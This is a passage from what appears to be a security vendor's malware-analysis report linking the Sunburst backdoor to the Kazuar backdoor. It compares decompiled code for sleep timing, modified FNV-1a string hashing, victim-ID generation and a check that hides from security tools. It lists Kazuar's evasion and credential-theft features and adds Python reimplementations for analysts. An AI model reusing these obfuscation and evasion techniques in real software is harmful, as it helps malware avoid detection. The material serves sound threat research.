            maxMs = 2000.0;
        }
        double num;
        for (num = minMs + new Random().NextDouble() * (maxMs - minMs); num >= 2147483647.0; num -= 2147483647.0)
        {
            Thread.Sleep(int.MaxValue);
        }
        Thread.Sleep((int)num);
    }

Comparing the two code fragments outlined above, we see that the algorithms are similar.
It’s noteworthy that both Kazuar and Sunburst wait for quite a long time before or in-between C2 connections. By default, Kazuar chooses a random sleeping time between two and four weeks, while Sunburst waits from 12 to 14 days. Sunburst, like Kazuar, implements a command which allows the operators to change the waiting time between two C2 connections.

Based on the analysis of the sleeping algorithm, we conclude:

  • Kazuar and Sunburst use the same mathematical formula, relying on Random().NextDouble() to calculate the waiting time
  • Kazuar randomly selects a sleeping period between two and four weeks between C2 connections
  • Sunburst randomly selects a sleeping period between twelve and fourteen days before contacting its C2
  • Such long sleep periods in C2 connections are not very common for typical APT malware
  • While Kazuar does a Thread.Sleep using a TimeSpan object, Sunburst uses an Int32 value; due to the fact that Int32.MaxValue is limited to roughly 24 days of sleep, the developers “emulate” longer sleeps in a loop to get past this limitation
  • In the case of both Kazuar and Sunburst, the sleeping time between two connections can be changed with the help of a command sent by the C2 server

The FNV-1a hashing algorithm

Sunburst uses the FNV-1a hashing algorithm extensively throughout its code. This detail initially attracted our attention and we tried to look for other malware that uses the same algorithm. It should be pointed out that the usage of this hashing algorithm is not unique to Kazuar and Sunburst. However, it provides an interesting starting point for finding more similarities. FNV-1a has been widely used by the Kazuar .NET Backdoor since its early versions. We compare the usage of FNV-1a in Kazuar and Sunburst below.

Kazuar

The shellcode used in Kazuar finds addresses of library functions with a variation of the FNV-1a hashing algorithm. The way of finding these addresses is traditional: the shellcode traverses the export address table of a DLL, fetches the name of an API function, hashes it and then compares the hash with a given value.

A variation of the FNV-1a hashing algorithm in Kazuar shellcode present in 2015-autumn 2020 samples, using a 0x1000197 modified constant instead of the default FNV_32_PRIME 0x1000193 (MD5 150D0ADDF65B6524EB92B9762DB6F074)

This customized FNV-1a 32-bit hashing algorithm has been present in the Kazuar shellcode since 2015. For the Kazuar binaries used in 2020, a modified 64-bit FNV-1a appeared in the code:

Kazuar, MD5 804785B5ED71AADF9878E7FC4BA4295C (Dec 2020). Implementation of a modified FNV-1a algorithm (64-bit version).

    public static ulong bu(string pK)
    {
        byte[] bytes = Encoding.UTF8.GetBytes(pK);
        ulong num = 0xCBF29CE484222325UL;
        ulong num2 = 0x69294589840FB0E8UL;
        ulong num3 = 0x100000001B3UL;
        for (int i = 0; i < bytes.Length; i++)
        {
            num ^= (ulong)bytes[i];
            num *= num3;
        }
        return num ^ num2;
    }

We observed that the 64-bit FNV-1a hash present in the 2020 Kazuar sample is also not standard. When the loop with the XOR and multiplication operations finishes execution, the resulting value is XOR-ed with a constant (XOR 0x69294589840FB0E8UL). In the original implementation of the FNV-1a hash, no XOR operation is applied after the loop.

Sunburst

Sunburst uses a modified, 64-bit FNV-1a hash for the purpose of string obfuscation. For example, when started, Sunburst first takes the FNV-1a hash of its process name (solarwinds.businesslayerhost) and checks if it is equal to a hardcoded value (0xEFF8D627F39A2A9DUL). If the hashes do not coincide, the backdoor code will not be executed:

    public static void Initialize()
    {
        try
        {
            if (OrionImprovementBusinessLayer.GetHash(Process.GetCurrentProcess().ProcessName.ToLower()) == 0xEFF8D627F39A2A9DUL) // "solarwinds.businesslayerhost"
            {
                // backdoor execution code
            }
        }
        catch
        {
            // any exception is silently swallowed
        }
    }

Hashes are also used to detect security tools running on the system. During its execution Sunburst iterates through the list of processes (Process.GetProcesses()), services (from “SYSTEM\\CurrentControlSet\\services“) and drivers (WMI, “Select * From Win32_SystemDriver“), hashes their names and looks them up in arrays containing the corresponding hardcoded hashes:

    private static bool SearchAssemblies(Process[] processes)
    {
        for (int i = 0; i < processes.Length; i++)
        {
            ulong hash = OrionImprovementBusinessLayer.GetHash(processes[i].ProcessName.ToLower());
            if (Array.IndexOf<ulong>(OrionImprovementBusinessLayer.assemblyTimeStamps, hash) != -1)
            {
                return true;
            }
        }
        return false;
    }

Below we compare the modified FNV-1a implementations in Kazuar and Sunburst.

String obfuscation comparison

Kazuar. Code adapted from MD5 804785B5ED71AADF9878E7FC4BA4295C (Dec 2020). Implementation of a modified 64-bit FNV-1a algorithm (deobfuscated, with constant folding applied).

    public static ulong bu(string pK)
    {
        byte[] bytes = Encoding.UTF8.GetBytes(pK);
        ulong num = 0xCBF29CE484222325UL;
        ulong num2 = 0x69294589840FB0E8UL;
        ulong num3 = 0x100000001B3UL;
        for (int i = 0; i < bytes.Length; i++)
        {
            num ^= (ulong)bytes[i];
            num *= num3;
        }
        return num ^ num2;
    }

Sunburst. MD5 2C4A910A1299CDAE2A4E55988A2F102E. Implementation of the modified 64-bit FNV-1a algorithm.

    private static ulong GetHash(string s)
    {
        ulong num = 0xCBF29CE484222325UL;
        try
        {
            foreach (byte b in Encoding.UTF8.GetBytes(s))
            {
                num ^= (ulong)b;
                num *= 0x100000001B3UL;
            }
        }
        catch
        {
        }
        return num ^ 0x5BAC903BA7D81967UL;
    }

It should be noted that both Kazuar and Sunburst use a modified 64-bit FNV-1a hash, which adds an extra step after the loop, XOR’ing the final result with a 64-bit constant.

Some readers might assume that the FNV-1a hashing was inserted by the compiler, because C# compilers can optimize switch statements over strings into a series of if statements. In this compiler-optimized code, the 32-bit FNV-1a algorithm is used to calculate hashes of strings:

Clean executable. Optimized switch statement.

    string key = keyValuePair.Key;
    uint num = <PrivateImplementationDetails>.ComputeStringHash(key); // computes 32-bit FNV-1a
    if (num <= 0x848C8620U)
    {
        if (num <= 0x3A79338FU)
        {
            if (num <= 0x150EFE0DU)
            {
                if (num != 0x11DE6CDCU)
                {
                    if (num != 0x13F0FB79U)
                    {
                        if (num == 0x150EFE0DU)
                        {
                            // direct string compare:
                            if (key == "divisibleBy")
                            {
                                // case handling code
                            }
    ...

Sunburst. MD5 2C4A910A1299CDAE2A4E55988A2F102E. Switch statement.

    ulong hash = OrionImprovementBusinessLayer.GetHash(text3.ToLower());
    if (hash <= 0x7B2647ACD648B3BFUL)
    {
        if (hash <= 0x54E145F4CDA21B52UL)
        {
            if (hash != 0x25F3EA85AE88826EUL)
            {
                if (hash == 0x54E145F4CDA21B52UL)
                {
                    // direct string compare missing
                    // case handling code
                }
    ...

In the case of Sunburst, the hashes in the switch statement do not appear to be compiler-generated. In fact, the C# compiler uses 32-bit, not 64-bit hashing. The hashing algorithm added by the compiler also does not have an additional XOR operation at the end. The compiler inserts the hashing method in the <PrivateImplementationDetails> class, while in Sunburst the same code is implemented within the OrionImprovementBusinessLayer class. The compiler-emitted FNV-1a method has the name ComputeStringHash; in the case of Sunburst, the method is named GetHash. Additionally, the compiler inserts a check which compares the hashed string with a hardcoded value in order to eliminate the possibility of a collision. In Sunburst, there are no such string comparisons, which suggests these hash checks are not a compiler optimization.

To conclude the findings, we summarize them as follows:

  • Both Sunburst and Kazuar use FNV-1a hashing throughout their code
  • A modified 32-bit FNV-1a hashing algorithm has been used by the Kazuar shellcode since 2015 to resolve APIs
  • This Kazuar shellcode uses a modified FNV-1a hash where its FNV_32_PRIME is 0x1000197 (instead of the default FNV_32_PRIME 0x1000193)
  • A modified 64-bit version of the FNV-1a hashing algorithm was implemented in Kazuar versions found in 2020
  • The modified 64-bit FNV-1a hashing algorithms implemented in Kazuar (November and December 2020 variants) have one extra step: after the hash is calculated, it is XORed with a hardcoded constant (0x69294589840FB0E8UL)
  • Sunburst also uses a modified 64-bit FNV-1a hashing algorithm, with one extra step: after the hash is calculated, it is XORed with a hardcoded constant (0x5BAC903BA7D81967UL)
  • The 64-bit constant used in the last step of the hashing is different between Kazuar and Sunburst
  • The aforementioned hashing algorithm is used to conceal plain strings in Sunburst
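The FNV-1a variants compared above, reproduced in Python as an added example (not code from this write-up or from either backdoor): the standard 32- and 64-bit hashes, the Kazuar shellcode prime 0x1000197, and the two final-XOR versions. The constants are the ones quoted in the text; the wordlist in the main block is constructed, and the lookup shows how an analyst resolves a hardcoded hash such as the process-name gate back to its plaintext.

```python
"""FNV-1a as used by Kazuar and Sunburst, reproduced for analysis.

Constants (offset basis, primes, the Kazuar shellcode prime 0x1000197 and the
two final-XOR values) are the ones quoted in the text above. The candidate
process names fed to resolve_hashes() below are constructed sample data."""

FNV32_OFFSET, FNV32_PRIME = 0x811C9DC5, 0x01000193
FNV64_OFFSET, FNV64_PRIME = 0xCBF29CE484222325, 0x100000001B3
MASK32, MASK64 = 0xFFFFFFFF, 0xFFFFFFFFFFFFFFFF

KAZUAR_SHELLCODE_PRIME = 0x1000197    # replaces FNV_32_PRIME in the shellcode
KAZUAR_2020_XOR = 0x69294589840FB0E8  # applied after the loop in Kazuar's bu()
SUNBURST_XOR = 0x5BAC903BA7D81967     # applied after the loop in GetHash()


def fnv1a(data: bytes, offset: int, prime: int, mask: int) -> int:
    """Plain FNV-1a core: XOR each byte in, then multiply by the prime."""
    h = offset
    for b in data:
        h ^= b
        h = (h * prime) & mask
    return h


def fnv1a_32(s: str, prime: int = FNV32_PRIME) -> int:
    """Standard 32-bit FNV-1a over the UTF-8 bytes of s (no final XOR)."""
    return fnv1a(s.encode("utf-8"), FNV32_OFFSET, prime, MASK32)


def fnv1a_64(s: str) -> int:
    """Standard 64-bit FNV-1a over the UTF-8 bytes of s (no final XOR)."""
    return fnv1a(s.encode("utf-8"), FNV64_OFFSET, FNV64_PRIME, MASK64)


def kazuar_shellcode_hash(s: str) -> int:
    """Kazuar shellcode API hashing: 32-bit FNV-1a with the 0x1000197 prime."""
    return fnv1a_32(s, KAZUAR_SHELLCODE_PRIME)


def kazuar_2020_hash(s: str) -> int:
    """Kazuar 2020 bu(): 64-bit FNV-1a, then XOR with its constant."""
    return fnv1a_64(s) ^ KAZUAR_2020_XOR


def sunburst_get_hash(s: str) -> int:
    """Sunburst GetHash(): 64-bit FNV-1a, then XOR with a different constant."""
    return fnv1a_64(s) ^ SUNBURST_XOR


def resolve_hashes(hashes, candidates, hash_fn):
    """Defender-side lookup: hash a wordlist of lower-cased candidate names
    with the recovered variant and map each hardcoded hash back to the name
    that produced it. Unresolved hashes are simply absent from the result."""
    table = {hash_fn(name.lower()): name.lower() for name in candidates}
    return {h: table[h] for h in hashes if h in table}


if __name__ == "__main__":
    # The process-name gate quoted above: only this name passes the check.
    gate = sunburst_get_hash("solarwinds.businesslayerhost")
    print(f"Sunburst process-name gate: {gate:#018x}")
    # Constructed wordlist; only the SolarWinds name comes from the text.
    names = ["explorer", "SolarWinds.BusinessLayerHost", "svchost"]
    print(resolve_hashes([gate], names, sunburst_get_hash))
    # Same core, different final constant: the two 64-bit variants always
    # differ by exactly the XOR of the two constants, whatever the input.
    print(f"{kazuar_2020_hash('x') ^ sunburst_get_hash('x'):#018x}")
```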

The algorithm used to generate victim identifiers

Another similarity between Kazuar and Sunburst can be found in the algorithm used to generate the unique victim identifiers, described below.

Kazuar

In order to generate unique strings (across different victims), such as client identifiers, mutexes or file names, Kazuar uses an algorithm which accepts a string as input. To derive a unique string from the given one, the backdoor gets the MD5 hash of the string and then XORs it with a four-byte unique “seed” from the machine. The seed is obtained by fetching the serial number of the volume where the operating system is installed.

Sunburst

An MD5+XOR algorithm can also be found in Sunburst. However, instead of the volume serial number, it uses a different set of information as the machine’s unique seed, hashes it with MD5 and then XORs the two halves of the hash together. The two implementations are compared in the following table:

Kazuar. The listed code is used in multiple versions of the backdoor, including MD5 150D0ADDF65B6524EB92B9762DB6F074 (2016) and 1F70BEF5D79EFBDAC63C9935AA353955 (2019+). The MD5+XOR algorithm.

    public static Guid md5_plus_xor(string string_0)
    {
        byte[] bytes = BitConverter.GetBytes(parameter_class.unique_pc_identifier);
        byte[] array = MD5.Create().ComputeHash(get_bytes_wrapper(string_0));
        for (int i = 0; i < array.Length; i++)
        {
            byte[] array2 = array;
            int num = i;
            array2[num] ^= bytes[i % bytes.Length];
        }
        return new Guid(array);
    }

Sunburst. MD5 2C4A910A1299CDAE2A4E55988A2F102E. Part of a function with the MD5+XOR algorithm.

    private static bool GetOrCreateUserID(out byte[] hash64)
    {
        string text = OrionImprovementBusinessLayer.ReadDeviceInfo();
        hash64 = new byte[8];
        Array.Clear(hash64, 0, hash64.Length);
        if (text == null)
        {
            return false;
        }
        // <part of the code omitted for clarity>
        using (MD5 md = MD5.Create())
        {
            byte[] bytes = Encoding.ASCII.GetBytes(text);
            byte[] array = md.ComputeHash(bytes);
            if (array.Length < hash64.Length)
            {
                return false;
            }
            for (int i = 0; i < array.Length; i++)
            {
                byte[] array2 = hash64;
                int num = i % hash64.Length;
                array2[num] ^= array[i];
            }
        }
        return true;
    }

To summarize these findings:

  • To calculate unique victim UIDs, both Kazuar and Sunburst use a hashing algorithm which is different from their otherwise “favourite” FNV-1a: a combination of MD5 and XOR
    • Kazuar XORs a full 128-bit MD5 of a pre-defined string with a four-byte key which contains the volume serial number
    • Sunburst computes an MD5 from a larger set of data, which concatenates the first adapter MAC address (retrieved using NetworkInterface.GetAllNetworkInterfaces()), the computer domain (GetIPGlobalProperties().DomainName) and the machine GUID (“HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography” -> “MachineGuid”), then XORs the two halves together into an eight-byte result
  • This MD5+XOR algorithm is present in all Kazuar samples used before November 2020 (a massive code change, almost a complete redesign, was applied to Kazuar in November 2020)
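The two identifier schemes just summarised, reproduced in Python as an added example (not code from this write-up or from either backdoor): Kazuar's MD5 XORed with a four-byte volume serial and returned with .NET Guid byte ordering, and Sunburst's MD5 folded into eight bytes. The volume serial, MAC address, domain and MachineGuid values are constructed, and since the text does not give the exact way Sunburst joins the three fields, build_device_info() is an assumption; the recovery helper shows that, for a host whose seed is known, an analyst can relate an observed identifier back to the plain hash.

```python
"""The MD5+XOR identifier schemes of Kazuar and Sunburst, reproduced for
analysis. All sample values in __main__ are constructed, and the field
concatenation in build_device_info() is an assumption, not the real format."""
import hashlib
import struct
import uuid


def kazuar_md5_xor(name: str, volume_serial: int) -> uuid.UUID:
    """Kazuar: MD5(name), each byte XORed with the 4-byte volume serial
    (little-endian, as BitConverter.GetBytes yields on Windows) repeated
    across the digest. Returned as a UUID using .NET Guid(byte[]) ordering."""
    seed = struct.pack("<I", volume_serial)
    digest = bytearray(hashlib.md5(name.encode("utf-8")).digest())
    for i in range(len(digest)):
        digest[i] ^= seed[i % len(seed)]
    return uuid.UUID(bytes_le=bytes(digest))


def recover_md5_from_kazuar_guid(guid: uuid.UUID, volume_serial: int) -> bytes:
    """Analyst helper: undo the XOR to get the plain MD5 back when the volume
    serial of the examined host is known (the serial is the only per-host input)."""
    seed = struct.pack("<I", volume_serial)
    data = bytearray(guid.bytes_le)
    for i in range(len(data)):
        data[i] ^= seed[i % len(seed)]
    return bytes(data)


def build_device_info(mac: str, domain: str, machine_guid: str) -> str:
    """Join of the three inputs the text names (MAC, domain, MachineGuid).
    Assumption: plain concatenation; the real delimiter/order is not given."""
    return mac + domain + machine_guid


def sunburst_user_id(device_info: str) -> bytes:
    """Sunburst GetOrCreateUserID: MD5 of the ASCII device string, folded to
    8 bytes by XORing byte i into slot i % 8, i.e. the two halves XORed."""
    digest = hashlib.md5(device_info.encode("ascii")).digest()
    hash64 = bytearray(8)
    for i, b in enumerate(digest):
        hash64[i % 8] ^= b
    return bytes(hash64)


if __name__ == "__main__":
    vol = 0x1234ABCD  # constructed volume serial
    guid = kazuar_md5_xor("client_id", vol)
    print("Kazuar-style GUID:", guid)
    print("recovered MD5    :", recover_md5_from_kazuar_guid(guid, vol).hex())
    info = build_device_info("00155D0A0B0C", "corp.example",
                             "6ba7b810-9dad-11d1-80b4-00c04fd430c8")
    print("Sunburst-style UID:", sunburst_user_id(info).hex())
```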

False flags possibility

The possibility of a false flag is particularly interesting and deserves additional attention. In the past, we have seen sophisticated attacks such as OlympicDestroyer confusing the industry and complicating attribution. Subtle mistakes, such as the raw re-use of the Rich header from the Lazarus samples from the Bangladesh bank heist, allowed us to demonstrate that they were indeed false flags and allowed us to eventually connect OlympicDestroyer with Hades, a sophisticated APT group.

Supposing that Kazuar false flags were deliberately introduced into Sunburst, there are two main explanations of how this may have happened:

  1. The use of the XOR operation after the main FNV-1a computation was introduced in the 2020 Kazuar variants after it had appeared in the Sunburst code. In this case, the possibility of a false flag is less likely, as the authors of Sunburst couldn’t have predicted the Kazuar developers’ actions with such high precision.
  2. A sample of Kazuar was released before Sunburst was written, containing the modified 64-bit hash function, and went unnoticed by everyone except the Sunburst developers. In this case, the Sunburst developers must have been aware of new Kazuar variants. Obviously, tracing all modifications of unknown code is quite a difficult and tedious task for the following reasons:
    • Kazuar’s developers are constantly changing their code as well as the packing methods, thus making it harder to detect the backdoor with YARA rules;
    • Kazuar samples (especially the new ones) quite rarely appear on VirusTotal.

The second argument comes with a caveat: the earliest Sunburst sample with the modified algorithm we have seen was compiled in February 2020, while the new Kazuar was compiled in or around November 2020. In the spring and summer of 2020, “old” samples of Kazuar were actively used, without the 64-bit modified FNV-1a hash. This means that option 1 (the extra XOR was introduced in the 2020 Kazuar variants after it had appeared in Sunburst) is more likely.

November 2020 – a new Kazuar

In November 2020, some significant changes happened to Kazuar. On November 18, our products detected a previously unknown Kazuar sample (MD5 9A2750B3E1A22A5B614F6189EC2D67FA). In this sample, the code was refactored, and the malware became much stealthier as most of its code no longer resembled that of the older versions. Here are the most important changes in Kazuar’s code:

  • The infamous “Kazuar’s {0} started in process {1} [{2}] as user {3}/{4}.” string was removed from the binary and replaced with a much subtler “Agent started inside {0}.” message, meaning that the backdoor is no longer called Kazuar in the logs. Despite that, the GUID, which was present in Kazuar since 2015 and serves as the backdoor’s unique identifier, still appears in the refactored version of Kazuar.
  • Depending on the configuration, the malware may now protect itself from being detected by the Anti-Malware Scan Interface by patching the first bytes of the AmsiScanBuffer API function.
  • New spying features have been added to the backdoor. Now Kazuar is equipped with a keylogger and a password stealer which can fetch browser history data, cookies, proxy server credentials and, most importantly, passwords from Internet browsers, Filezilla, Outlook, Git and WinSCP. It also gets vault credentials. The stealer is implemented in the form of a C2 server command.
  • Commands have been completely revamped. The system information retrieval function now also hunts for UAC settings and installed hot patches and drivers. The webcam shot-taking command has been completely removed from the backdoor. Commands which allow the execution of WMI commands and the running of arbitrary PowerShell, VBS and JS scripts have been introduced into Kazuar. The malware can now also gather forensic data (“forensic” is a name of a command present in the refactored version of Kazuar). Kazuar collects information about executables that run at startup, recently launched executables and compatibility assistant settings. Furthermore, a command to collect saved credentials from files left from unattended installation and IIS has been introduced into the backdoor.
  • The data is now exfiltrated to the C2 server using ZIP archives instead of TAR.
  • A class that implements parsing of different file formats has been added into Kazuar. It is currently not used anywhere in the code. This class can throw exceptions with the “Fucking poltergeist” text. In earlier versions of Kazuar, a “Shellcode fucking poltergeist error” message was logged if there was a problem with shellcode.
  • The MD5+XOR algorithm is not as widely used as before in the latest version of Kazuar. The backdoor generates most of unique strings and identifiers with an algorithm which is based on the already discussed FNV-1a hash and Base62. The MD5+XOR algorithm itself has been modified. Its new implementation is given below:
    Kazuar (2020). The modified MD5+XOR algorithm.

      public static string ZK(string X, string JK = null)
      {
          if (YU.fG(JK))
          {
              JK = oR.d6;
          }
          string str = X.ToLower();
          string s = "pipename-" + str + "-" + JK;
          byte[] bytes = Encoding.UTF8.GetBytes(s);
          byte[] array = MD5.Create().ComputeHash(bytes);
          byte b = 42;
          byte b2 = 17;
          byte b3 = 21;
          for (int i = 0; i < array.Length; i++)
          {
              // running 8-bit key: multiply, then add, truncated to a byte each step
              b = (byte)(b * b2 & byte.MaxValue);
              b = (byte)(b + b3 & byte.MaxValue);
              byte[] array2 = array;
              int num = i;
              array2[num] ^= b;
          }
          Guid guid = new Guid(array);
          return guid.ToString("B").ToUpper();
      }
  • The random sleeping interval generation algorithm mentioned in the main part of the report also appears to be missing from the updated backdoor sample. In order to generate a random sleeping period, the malware now uses a more orthodox random number generation algorithm:
    Kazuar (2020). The new random number generation algorithm. Methods were renamed for clarity.

      public static long generate_random_number_in_range(long wG, long NG)
      {
          if (wG > NG)
          {
              utility_class.swap<long>(ref wG, ref NG);
          }
          return Math.Abs(utility_class.get_random_int64()) % (NG - wG + 1L) + wG;
      }

The newest sample of Kazuar (MD5 024C46493F876FA9005047866BA3ECBD) was detected by our products on December 29. It also contained refactored code.

For now, it’s unclear why the Kazuar developers implemented these massive code changes in November. Some possibilities include:

  • It’s a normal evolution of the codebase, where new features are constantly added while older ones are removed
  • The Kazuar developers wanted to avoid detection by various antivirus products or EDR solutions
  • Suspecting the SolarWinds attack might be discovered, the Kazuar code was changed to resemble the Sunburst backdoor as little as possible

Conclusions

These code overlaps between Kazuar and Sunburst are interesting and represent the first potential identified link to a previously known malware family.

Although the usage of the sleeping algorithm may be too widespread to be telling, the custom implementation of the FNV-1a hashes and the reuse of the MD5+XOR algorithm in Sunburst are definitely important clues. We should also point out that although similar, the UID calculation subroutine and the FNV-1a hash usage, as well as the sleep loop, are still not 100% identical.

Possible explanations for these similarities include:

  • Sunburst was developed by the same group as Kazuar
  • The Sunburst developers adopted some ideas or code from Kazuar, without having a direct connection (they used Kazuar as an inspiration point)
  • Both groups, DarkHalo/UNC2452 and the group using Kazuar, obtained their malware from the same source
  • Some of the Kazuar developers moved to another team, taking knowledge and tools with them
  • The Sunburst developers introduced these subtle links as a form of false flag, in order to shift blame to another group

At the moment, we do not know which one of these options is true. While Kazuar and Sunburst may be related, the nature of this relation is still not clear. Through further analysis, it is possible that evidence confirming one or several of these points might arise. At the same time, it is also possible that the Sunburst developers were really good at their opsec and didn’t make any mistakes, with this link being an elaborate false flag. In any case, this overlap doesn’t change much for the defenders. Supply chain attacks are some of the most sophisticated types of attacks nowadays and have been successfully used in the past by APT groups such as Winnti/Barium/APT41 and various cybercriminal groups.

To limit exposure to supply chain attacks, we recommend the following:

  • Isolate network management software in separate VLANs, monitor them separately from the user networks
  • Limit outgoing internet connections from servers or appliances that run third party software
  • Implement regular memory dumping and analysis, checking for malicious code running in a decrypted state using a code similarity solution such as Kaspersky Threat Attribution Engine (KTAE)

More information about UNC2452, DarkHalo, Sunburst and Kazuar is available to customers of the Kaspersky Intelligence Reporting service. Contact: intelreports[at]kaspersky.com

FAQ
  1. TL;DR: just tell us who’s behind the SolarWinds supply chain attack?
    Honestly, we don’t know. What we found so far is a couple of code similarities between Sunburst and a malware discovered in 2017, called Kazuar. This malware was first observed around 2015 and is still being used in the wild. The most advanced Kazuar sample we found is from December 2020. During five years of Kazuar evolution, we observed a continuous development, in which significant features, which bear resemblance to Sunburst, were added. While these similarities between Kazuar and Sunburst are notable, there could be a lot of reasons for their existence, including:
    • Sunburst was developed by the same group as Kazuar
    • The Sunburst developers used some ideas or code from Kazuar, without having a direct connection (they used Kazuar code as “inspiration”)
    • Both groups, that is, the DarkHalo/UNC2452 and the group using Kazuar obtained their malware from the same source
    • One of the Kazuar developers moved to another team, taking their knowledge and tools with them
    • The Sunburst developers introduced these subtle links as a form of a false flag, in order to shift the blame to another group

    At the moment, we simply do not know which of these options is true. Through further analysis, it is possible that evidence reinforcing one or several of these points might arise. To clarify – we are NOT saying that DarkHalo / UNC2452, the group using Sunburst, and Kazuar or Turla are the same.

  2. What are these similarities? Could these similarities be just coincidences?
    In principle, none of these algorithms or implementations are unique. In particular, the things that attracted our attention were the obfuscation of strings through modified FNV-1a algorithms, where the hash result is XOR’ed with a 64-bit constant; the implementation of the C2 connection delay, using a large (and unusual) value (Kazuar uses a random sleeping time between two and four weeks, while Sunburst waits from 12 to 14 days); and the calculation of the victim UID through an MD5 + XOR algorithm. It should be pointed out that none of these code fragments are 100% identical. Nevertheless, they are curious coincidences, to say the least. One coincidence wouldn’t be that unusual, two coincidences would definitely raise an eyebrow, while three such coincidences are kind of suspicious to us.
  3. What is this Kazuar malware?
    Kazuar is a fully featured .NET backdoor, and was first reported by our colleagues from Palo Alto Networks in 2017. The researchers surmised at the time that it may have been used by the Turla APT group, in order to replace their Carbon platform and other Turla second stage backdoors. Our own observations confirm that Kazuar was used, together with other Turla tools, during multiple breaches in the past few years, and is still in use. Also, Epic Turla resolves imports with another customized version of the FNV-1a hash and has code similarities with Kazuar’s shellcode.
  4. So Sunburst is connected to Turla?
    Not necessarily, refer to question 1 for all possible explanations.
  5. The media claims APT29 is responsible for the SolarWinds hack. Are you saying that’s wrong?
    We do not know who is behind the SolarWinds hack – we believe attribution is a question better left for law enforcement and judicial institutions. To clarify, our research has identified a number of shared code features between the Sunburst malware and Kazuar.
    Our research has placed APT29 as another potential name for “The Dukes”, which appears to be an umbrella group comprising multiple actors and malware families. We initially reported MiniDuke, the earliest malware in this umbrella, in 2013. In 2014, we reported other malware used by “The Dukes”, named CosmicDuke. In CosmicDuke, the debug path strings from the malware seemed to indicate several build environments or groups of “users” of the “Bot Gen Studio”: “NITRO” and “Nemesis Gemina”. In short, we suspect CosmicDuke was being leveraged by up to three different entities, raising the possibility it was shared across groups. One of the interesting observations from our 2014 research was the usage of a webshell by one of the “Bot Gen Studio” / “CosmicDuke” entities that we have seen before in use by Turla. This could suggest that Turla is possibly just one of the several users of the tools under the “Dukes” umbrella.
  6. How is this connected to Cozy Duke?
    In 2015, we published further research on CozyDuke, which seemed to focus on what appeared to be government organizations and commercial entities in the US, Germany and other countries. In 2014, their targets, as reported in the media, included the White House and the US Department of State. At the time, the media also called it “the worst ever” hack. At the moment, we do not see any direct links between the 2015 CozyDuke and the SolarWinds attack.
  7. How solid are the links with Kazuar?
    Several code fragments from Sunburst and various generations of Kazuar are quite similar. We should point out that, although similar, these code blocks, such as the UID calculation subroutine and the FNV-1a hashing algorithm usage, as well as the sleep loop, are still not 100% identical. Together with certain development choices, these suggest that a similar thought process went into the development of Kazuar and Sunburst. The Kazuar malware continued to evolve and later 2020 variants are even more similar, in some respects, to the Sunburst branch. Yet, we should emphasise again, they are definitely not identical.
  8. So, are you saying Sunburst is essentially a modified Kazuar?
    We are not saying Sunburst is Kazuar, or that it is the work of the Turla APT group. We spotted some interesting similarities between these two malware families and felt the world should know about them. We love to do our part, contributing our findings to the community discussions; others can check these similarities on their own, draw their own conclusions and find more links. The most important thing here is to publish interesting findings and encourage others to do more research. We will, of course, continue with our own research too.
  9. Is this the worst cyberattack in history?
    Attacks should always be judged from the victim’s point of view. That judgment should also account for physical damage, if any, loss of human lives and so on. For now, it would appear the purpose of this attack was cyberespionage, that is, extraction of sensitive information. By comparison, other infamous attacks, such as NotPetya or WannaCry, had a significantly destructive side, with victim losses in the billions of dollars. Yet, for some out there, this may be more devastating than NotPetya or WannaCry; for others, it pales in comparison.
  10. How did we get here?
    During the past years, we’ve observed what can be considered a “cyber arms race”. Pretty much all nation states have rushed, since the early 2000s, to develop offensive military capabilities in cyberspace, with little attention to defense. The difference is immediately notable when it comes to the budgets available for the purchase of offensive cyber capabilities vs the development of defensive capabilities. The world needs more balance to the (cyber-)force. Without that, the existing cyber conflicts will continue to escalate, to the detriment of the normal internet user.
  11. Is it possible this is a false flag?
    In theory, anything is possible; and we have seen examples of sophisticated false flag attacks, such as the OlympicDestroyer attack. For a full list of possible explanations refer to question 1.
  12. So. Now what?
    We believe it’s important that other researchers around the world also investigate these similarities and attempt to discover more facts about Kazuar and the origin of Sunburst, the malware used in the SolarWinds breach. If we consider past experience, for instance looking back to the WannaCry attack, in the early days there were very few facts linking it to the Lazarus group. In time, more evidence appeared and allowed us, and others, to make that link with high confidence. Further research on this topic can be crucial to connecting the dots.
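
The modified FNV-1a string obfuscation mentioned in questions 2 and 7, written out as an added example (not code from Kaspersky, Sunburst or Kazuar), together with the reverse lookup an analyst uses to resolve such hashes from a wordlist. The XOR constant, the UTF-8 encoding and the candidate wordlist are assumptions; the real constant is sample-specific and is not given on the page.

```python
"""Modified FNV-1a string hashing of the kind described in questions 2 and 7,
plus the reverse lookup an analyst uses to resolve hashed strings.
Added example; not code from Kaspersky, Sunburst or Kazuar."""
from typing import Dict, Iterable, Optional

FNV64_OFFSET = 0xCBF29CE484222325  # standard FNV-1a 64-bit parameters
FNV64_PRIME = 0x100000001B3
MASK64 = (1 << 64) - 1

# Placeholder: the real post-hash XOR constant is sample-specific and is not
# given on the page; recover it from the binary under analysis (see below).
XOR_CONSTANT = 0x0123456789ABCDEF


def fnv1a_64(data: bytes) -> int:
    """Plain 64-bit FNV-1a over raw bytes."""
    h = FNV64_OFFSET
    for b in data:
        h ^= b
        h = (h * FNV64_PRIME) & MASK64
    return h


def modified_fnv1a(s: str, xor_constant: int = XOR_CONSTANT) -> int:
    """The variant described on the page: FNV-1a of the string's bytes, with
    the result XORed against a 64-bit constant. UTF-8 is an assumption; check
    which encoding the sample actually feeds into the hash."""
    return fnv1a_64(s.encode("utf-8")) ^ xor_constant


def build_lookup(candidates: Iterable[str],
                 xor_constant: int = XOR_CONSTANT) -> Dict[int, str]:
    """Precompute hash -> plaintext for a wordlist (process names, service
    names, API names) so hashes found in a sample can be resolved."""
    return {modified_fnv1a(c, xor_constant): c for c in candidates}


def resolve(h: int, table: Dict[int, str]) -> Optional[str]:
    """Look a hash up in the precomputed table; None when unknown."""
    return table.get(h)


def recover_xor_constant(known_plaintext: str, observed_hash: int) -> int:
    """One known (plaintext, hash) pair gives the constant directly, because
    XOR is its own inverse: const = fnv1a(plaintext) ^ observed."""
    return fnv1a_64(known_plaintext.encode("utf-8")) ^ observed_hash


if __name__ == "__main__":
    # Constructed wordlist; real analysis uses a much larger one.
    words = ["svchost.exe", "lsass.exe",
             "SolarWinds.Orion.Core.BusinessLayer.dll"]
    table = build_lookup(words)
    target = modified_fnv1a("lsass.exe")
    print(f"{target:#018x} -> {resolve(target, table)}")
    print(f"recovered constant: {recover_xor_constant('lsass.exe', target):#x}")
```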
Indicators of Compromise

File hashes:


